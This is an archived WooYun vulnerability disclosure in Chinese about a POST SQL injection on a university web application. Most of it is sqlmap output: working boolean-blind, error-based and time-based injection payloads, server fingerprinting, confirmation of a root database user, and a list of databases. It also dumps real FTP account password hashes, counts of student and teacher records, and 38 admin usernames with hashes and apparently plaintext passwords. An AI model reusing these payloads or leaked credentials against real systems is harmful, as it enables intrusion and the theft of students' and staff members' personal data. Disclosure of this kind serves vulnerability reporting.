乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
post注入多个数据库沦陷
注入点:http://**.**.**.**/e/enews/index.php注入类型:
---Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---[17:20:24] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0---
root权限:
web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0[23:12:08] [INFO] fetching current user[23:12:08] [INFO] resumed: root@localhostcurrent user: 'root@localhost'
涉及多个学院数据库:
sqlmap identified the following injection point(s) with a total of 1136 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0sqlmap resumed the following injection point(s) from stored session:---Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0available databases [14]:[*] ftp[*] information_schema[*] mysql[*] test[*] usr_zjuemba[*] zheda[*] zju_cma[*] zju_emba[*] zju_gep[*] zju_gmc[*] zju_jcie[*] zju_niim[*] zju_som[*] zju_vote
所有站点ftp账号密码泄露:
Database: ftpTable: users[10 entries]+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+| id | gid | uid | userid | shell | passwd | homedir | count | lastlogin | lastlogout |+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+| 1 | 1000 | 1000 | bak | <blank> | RQdSXtbKHJpQc | /home/bak/ | 1265 | 2015-11-20 06:01:26 | 2015-11-20 06:01:49 || 2 | 1000 | 1000 | web | <blank> | NMeksVb/ZqZlw | /home/www/zju_cma | 70 | 2015-03-10 11:11:05 | 2015-03-10 11:11:37 || 3 | 1000 | 1000 | cbnet | <blank> | YLOTe6F1B0VLc | /home/www | 2162 | 2015-11-10 12:36:55 | 2015-11-10 12:37:18 || 4 | 1000 | 1000 | log | <blank> | Je5h82zwXSj7c | /var/log/httpd | 24 | 2015-11-20 07:55:58 | 2015-11-20 07:56:22 || 5 | 1000 | 1000 | cbnetbak | <blank> | an9YOUS1jqAIg | /home/bak | 9 | 2015-03-06 08:45:06 | 2015-03-06 08:55:56 || 6 | 1000 | 1000 | zjusom | <blank> | in8Cti.VNGf1E | /home/www/zju_som | 22 | 2015-05-06 12:14:21 | 2015-05-06 12:19:41 || 7 | 1000 | 1000 | **.**.**.** | <blank> | v3FedKzdZDlPQ | /home/www/**.**.**.** | 225 | 2014-10-09 07:33:59 | 2014-10-09 07:38:08 || 8 | 1000 | 1000 | lxt | <blank> | RkH7YkeuqsKkM | /home/www/ | 1186 | 2015-10-15 12:16:46 | 2015-10-15 12:17:48 || 9 | 1000 | 1000 | zju_emba | <blank> | FUx2VZdQyJKcs | /home/www/**.**.**.** | 1074 | 2015-09-10 15:35:31 | 2015-09-10 15:44:18 || 11 | 1000 | 1000 | 35year | <blank> | jNXvBY6A9Nl0A | /home/www/zju_som/35year | 108 | 2015-07-06 21:12:57 | 2015-07-06 21:22:05 |
数千条学生教师基本信息泄露(包括姓名学号班级专业,家庭住址,简历等):
+--------------------+---------+| Table | Entries |+--------------------+---------+| student_login_log | 118955 || teacher_login_log | 32051 || article | 23158 || admin_log | 19863 || article20110418 | 16533 || cma_news | 13284 || admin_login_log | 10417 || meeting | 7291 || student | 3495 |学生信息表| student20120306 | 2797 || student20110919 | 2470 || student20110909 | 2314 || student20110331 | 2089 || article_baoming | 1538 || zt_xly2011_baoming | 1161 || zt_xly2013_baoming | 980 || zt_xly2010_baoming | 849 || zt_xly2014_baoming | 822 || zt_xly2012_baoming | 632 || student20121022 | 446 || zt_yx2011_baoming | 396 || teacher | 311 |教师信息表| article_cate | 169 || base_info | 88 || friends | 57 || dept | 49 || upload_files | 43 || admin_user | 38 || zt_cate | 22 || zt_yx2011_jiabin | 15 || base_cate | 9 || room | 9 || en_index_pic | 7 || friend_cate | 6 || zt_huodong | 6 || gundong | 5 || peiyang | 4 || photo | 4 || teacher_bak | 4 || article_wcate | 3 || faqs | 3 || qa_cate | 3 || class | 2 || zhuanye | 2 || zt_info | 2 || sitemap | 1 |+--------------------+---------+
后台管理员账号密码泄露:
Database: zju_somTable: admin_user[38 entries]+------------+----------------------------------+| username | password |+------------+----------------------------------+| xyb | 1a78e00f947d922875b4fa035a7746e9 || lib | 1b8e2eedc760a5157e1c454882f49d5b || gzfh | 29ca867cfdc823a39185802165ea9ed0 || bkssz | 2d12f9a3e83a401dfa824b9eb91b45d1 || hzfh | 37b0f998f7e024ee253c2927eedd4fe5 || cdc | 3a5e33237a0967d899ff9c0982814a03 || card | 3lzjugk9010192 || kjx | 4173a1ba1d52a39847eefbd1b61a2e35 || zsyjy | 43f2e1338801e44728f766a80ca9c5e1 || amtc | 4ebf3ac052c754abe7ae8ef057e924bf || lab | 57f1b47bce0d9519ed5ad6314eeff98f || rsk | 6u7cugwa8jl4j7zm || shfh | 72c446807f367c2d692eb58058e75c34 || hxc | 81304745cc82d4a40fb1f5101a147859 || jykj | 8731323a909ba0422e0ab67dd6861fe2 || rzb | 8b5f4ffc8f94bddee54520f11063ee1b || alzx | 96e79218965eb72c92a549dd5a330112 || bjfh | a772bf7849c7dc7963b97aba5add09aa || yjsjy | aeee7575b44211014bbdaf4af5dd4f36 || zjuc | b0edbda8f13bf3ad582744f135241670 || admin51yfg | b30d46a395ddf29de329feb886939461 || zjl | b3275960d68fda9d831facc0426c3bbc || admin36zgf | cd5b42d74fd56bb8604d13f8701ef316 || lyx | da93c5eaf76c613c4032f382809d42a4 || szfh | dc20cd2454dcdafad3f94abc7585e661 || kyk | dm6utkj78j01k9 || gjjl | dm6utkj78j01k9 || qgx | e2e425bf9b850789373ee6e608eb4f5a || yjssz | e64d1056f0274a1017766efea59f0ac1 || ggx | f379eaf3c831b04de153469d1bec345e || dzb | f379eaf3c831b04de153469d1bec345e || jxx | f379eaf3c831b04de153469d1bec345e || wzfh | f9f6f822a60a4dd253a21f26de86382b || niim | gbq2dmaq5l0101l4 || gh | k9r38jx08j3h || lxd | l4l443l401l4l43h || emba | m7gb21211wgb0paq || mba | tk3l3l%@odk9k9 |+------------+----------------------------------+
后台可进怕开除,不搞了,就这样吧。
过滤
危害等级:无影响厂商忽略
忽略时间:2015-12-01 22:26
暂无